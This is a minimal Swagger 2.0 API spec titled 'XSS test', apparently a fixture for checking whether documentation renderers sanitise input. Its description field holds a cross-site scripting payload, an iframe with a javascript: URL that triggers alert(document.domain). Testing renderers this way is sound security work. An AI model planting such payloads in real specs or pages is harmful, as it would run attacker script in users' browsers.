swagger: "2.0"
info:
  title: "XSS test"
  version: "1.0.0"
  description: |
    <iframe src=javascript:alert(document.domain)>
paths:
  /x:
    get:
      responses:
        "200": { description: "OK" }
